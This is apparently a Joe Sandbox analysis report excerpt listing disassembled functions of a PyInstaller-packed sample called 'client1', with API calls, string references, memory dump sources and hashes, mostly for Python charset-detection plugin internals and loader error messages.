                                                    Function 00007FFBAB4953E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'TooManyAccentuatedPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                    • API String ID: 1450464846-2022335554
                                                    • Opcode ID: fdb480920a9c7451cec282b0e84ab22eb2604cbd690f3a3138818415a15115d6
                                                    • Instruction ID: 8ecad50d3eb445d613da023ee3fa9e0c248c3d5162aeacc8783d5f24d690505d
                                                    • Opcode Fuzzy Hash: fdb480920a9c7451cec282b0e84ab22eb2604cbd690f3a3138818415a15115d6
                                                    • Instruction Fuzzy Hash: DF3141B1F1A60281EE96DB36E4963BD2360EF94B94F688135DE3D067F5DE2CD4958300
                                                    Function 00007FFBAB497F10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB497F28
                                                    • int, xrefs: 00007FFBAB498020
                                                    • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted, xrefs: 00007FFBAB497F9C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted$attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined$int
                                                    • API String ID: 1450464846-528010561
                                                    • Opcode ID: defae08e7b3a0dd3c431b0c8500a5d264029df500944186d54015f502eff64ef
                                                    • Instruction ID: 2b68e55dfaf7f6f6058ef9397f7576d040c6c5d21385788982bbfa244274f3f8
                                                    • Opcode Fuzzy Hash: defae08e7b3a0dd3c431b0c8500a5d264029df500944186d54015f502eff64ef
                                                    • Instruction Fuzzy Hash: 0D316FB1B1A50282EE46DB3AE4952BD2790EF84B94F589131EE7D077F5DF2CD4858300
                                                    Function 00007FFBAB494C00 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB494D10
                                                    • 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted, xrefs: 00007FFBAB494C8C
                                                    • attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB494C18
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted$attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                    • API String ID: 1450464846-1459665959
                                                    • Opcode ID: 9e31c213de300c1c91f799274bfbd503a1e836ef80330a027f4a639cda506582
                                                    • Instruction ID: ac28138c42f24396017c4f120add8e2f2507e6557bdc48855afdff1346105a07
                                                    • Opcode Fuzzy Hash: 9e31c213de300c1c91f799274bfbd503a1e836ef80330a027f4a639cda506582
                                                    • Instruction Fuzzy Hash: 1D318EA1B1A50285EE56DB3AE4952BD2390EF84B94F598231DE3D077F5DE2DD884C340
                                                    Function 00007FFBAB495EB0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB495FC0
                                                    • attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFBAB495EC8
                                                    • 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB495F3C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                    • API String ID: 1450464846-543361526
                                                    • Opcode ID: 9bcf1ef78a725aaeeef43bd59b6ac542a859ae93bbca7b23511126d1c23ff142
                                                    • Instruction ID: cb22b0b95ddb9f2726b534e5dda2d3f99839c8415a4a35417c9b157c5e60d87c
                                                    • Opcode Fuzzy Hash: 9bcf1ef78a725aaeeef43bd59b6ac542a859ae93bbca7b23511126d1c23ff142
                                                    • Instruction Fuzzy Hash: 483182B1F1AA0281EE56DB36E49527D23A0FF84BA4F588231DE7E467F5DE2CD4958300
                                                    Function 00007FFBAB497CB0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB497DC0
                                                    • attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB497CC8
                                                    • 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted, xrefs: 00007FFBAB497D3C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted$attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined$int
                                                    • API String ID: 1450464846-2037488444
                                                    • Opcode ID: 5b1ffb8ff21230ac9e4d41d12f10005ed943449f8ea347bcad047da562003861
                                                    • Instruction ID: 49ee3cebe86cb2bc57c84e49affb503e802db2b16165813fa343fd3780e4e041
                                                    • Opcode Fuzzy Hash: 5b1ffb8ff21230ac9e4d41d12f10005ed943449f8ea347bcad047da562003861
                                                    • Instruction Fuzzy Hash: C53160A1B1A50282EE56DB36E4952BD2760FF84B94F588231DE7E077F6DF2CD4948300
                                                    Function 00007FFBAB496FA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                    • API String ID: 1450464846-3920090044
                                                    • Opcode ID: 716bc62510ac8dda9762ecc1e7d0d488a86fd9f5daba0dbbae311ce027f2b779
                                                    • Instruction ID: 52687b18208ac15a343e3c7c9868982f0cb6b69c037f4c70fbbeeb3b0f5f4a3a
                                                    • Opcode Fuzzy Hash: 716bc62510ac8dda9762ecc1e7d0d488a86fd9f5daba0dbbae311ce027f2b779
                                                    • Instruction Fuzzy Hash: DB316FA1F1A50281FE46DB36E4D52BD2390EF84B94F589135DE7E067B6DF2DE8858300
                                                    Function 00007FFBAB4958D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'UnprintablePlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'UnprintablePlugin' undefined$int
                                                    • API String ID: 1450464846-2596148235
                                                    • Opcode ID: 2d1020cd279b47584a275813fcdef8f797012f73d456c9dd67c63cf5583baef3
                                                    • Instruction ID: d783a9449eb9a915126923f650c97703e0b0f354e29967fa3917933d66c84ef9
                                                    • Opcode Fuzzy Hash: 2d1020cd279b47584a275813fcdef8f797012f73d456c9dd67c63cf5583baef3
                                                    • Instruction Fuzzy Hash: 943160B1F1A60282EE56DB36E49527D23A0EF84BA4F588231DE7E067F5DE2CD4948300
                                                    Function 00007FFBAB494E60 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB494F70
                                                    • attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB494E78
                                                    • 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB494EEC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                    • API String ID: 1450464846-4240200891
                                                    • Opcode ID: 78741dcd6c4160e9c56fef5f28cb7a947163db393939fc1ad185ddcfec3d076a
                                                    • Instruction ID: 66517c4ff7f8033c55eab588ab3178e01699dce60dce227c714f8b8553c49564
                                                    • Opcode Fuzzy Hash: 78741dcd6c4160e9c56fef5f28cb7a947163db393939fc1ad185ddcfec3d076a
                                                    • Instruction Fuzzy Hash: 69318FA1F1A50281EE66DB36E4952BD2360EF88BA4F488231DE3D077F5DE2CD884C340
                                                    Function 00007FFBAB495D80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB495E90
                                                    • attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFBAB495D98
                                                    • 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted, xrefs: 00007FFBAB495E0C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted$attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                    • API String ID: 1450464846-1864222365
                                                    • Opcode ID: ede0fe6ae653843410b6476b536458421e0c0394d7e32887f4812a8ca2613d72
                                                    • Instruction ID: c9334a92d1d7c7b436752dc0bf9dd7da6ff7e9ea27abb3cb5162c7db1f1eadd2
                                                    • Opcode Fuzzy Hash: ede0fe6ae653843410b6476b536458421e0c0394d7e32887f4812a8ca2613d72
                                                    • Instruction Fuzzy Hash: 563161B1F1A60291EE46DB36E4952BD2360FF94B94F688235DE3D467F5DE2DD8848300
                                                    Function 00007FFBAB494D30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_symbol_count' cannot be deleted$attribute '_symbol_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                    • API String ID: 1450464846-2291034628
                                                    • Opcode ID: c2e24b558124de55cf48d8667fda7d02b9c15b91cbe80d004c2bd506434f8363
                                                    • Instruction ID: 2fbe81789120fa4d5da842fb530dd6f7e0230641bb1fd46c671a5442f2f25755
                                                    • Opcode Fuzzy Hash: c2e24b558124de55cf48d8667fda7d02b9c15b91cbe80d004c2bd506434f8363
                                                    • Instruction Fuzzy Hash: 79318FA5F1A50292EE66DB36E4952BD2360EF88B94F488231DE7D077F5DE2CE4948340
                                                    Function 00007FFBAB496C20 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_word_count' cannot be deleted$attribute '_bad_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                    • API String ID: 1450464846-3520798986
                                                    • Opcode ID: 60bbb626cce52f488fbb40c6ab4ac6f5130ec404c89593ac7919945a130b0fce
                                                    • Instruction ID: 37ccde9d49ca16a9ccf4750ada72c057827add13fe31c6a0259c5f062b3bba3f
                                                    • Opcode Fuzzy Hash: 60bbb626cce52f488fbb40c6ab4ac6f5130ec404c89593ac7919945a130b0fce
                                                    • Instruction Fuzzy Hash: 4D315CA1B1A50282EF56DB36E4D52BD2360EF88B94F588235EE7E067B5DE2CD4948300
                                                    Function 00007FFBAB496D50 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_count' cannot be deleted$attribute '_foreign_long_count' of 'SuperWeirdWordPlugin' undefined$int
                                                    • API String ID: 1450464846-3135691889
                                                    • Opcode ID: 7d54ae8d25dbb77536147f2b5954e326a1cde14a89e02d91d4bda525f7568c68
                                                    • Instruction ID: 0b5cde92503088ed5251b5e6869c8d30d381f6069165cb942e77f9cf8e1521a9
                                                    • Opcode Fuzzy Hash: 7d54ae8d25dbb77536147f2b5954e326a1cde14a89e02d91d4bda525f7568c68
                                                    • Instruction Fuzzy Hash: 723160A1B1A50291FF56DB3AE4952BD2360EF84BA4F588235DE7D067B5DE2CD8948300
                                                    Function 00007FFBAB498040 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                    • API String ID: 1450464846-4184598959
                                                    • Opcode ID: 95b42a7a6c77e1ee42d9360d44cd47314993f2cb00c775376b8053bca88cdcdc
                                                    • Instruction ID: 185283242f1a0a1f4dd4a85779473d74aa0c06afb67a7d1f4fbc2a74f0ff5654
                                                    • Opcode Fuzzy Hash: 95b42a7a6c77e1ee42d9360d44cd47314993f2cb00c775376b8053bca88cdcdc
                                                    • Instruction Fuzzy Hash: BC316EA1B1A60281EE46DB3AE4D52BD2790EF84BD4F589135DE7E067B5DE2CE885C300
                                                    Function 00007FFBAB49CFF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t$ContainsNumber_Object_Set_Vectorcall
                                                    • String ID: bool$feed
                                                    • API String ID: 3415927029-2849697477
                                                    • Opcode ID: 75989d3a8ab21030ecd09d936046dd064d493ce40fe554d82fa1436c5afcabda
                                                    • Instruction ID: c90eb331598d3a54dd68efdce0ac8892764b180d57ce7d57643d4079ba96a0e3
                                                    • Opcode Fuzzy Hash: 75989d3a8ab21030ecd09d936046dd064d493ce40fe554d82fa1436c5afcabda
                                                    • Instruction Fuzzy Hash: EB3162B1A1BE0282FA629B36E49117E6760FF44BC4F488035DE6D07776DE2DE4918740
                                                    Function 00007FF79F62CEE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CF6D
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CF7B
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFA5
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFEB
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFF7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                    • Instruction ID: d7c5080cdd8f26468dbd7bdde6db1f1dbefc9b6bdc914f9bdde3b44db8140bda
                                                    • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                    • Instruction Fuzzy Hash: E131A121A1A78291FE71BF22AC005F5A2AAFF08BB4F994535DD2D87390DF3CE5458721
                                                    Function 00007FF79F626480 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF79F6267CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF79F6264DF
                                                      • Part of subcall function 00007FF79F622770: MessageBoxW.USER32 ref: 00007FF79F622841
                                                    Strings
                                                    • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF79F6264B6
                                                    • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF79F6264F3
                                                    • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF79F62653A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                    • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                    • API String ID: 1662231829-3498232454
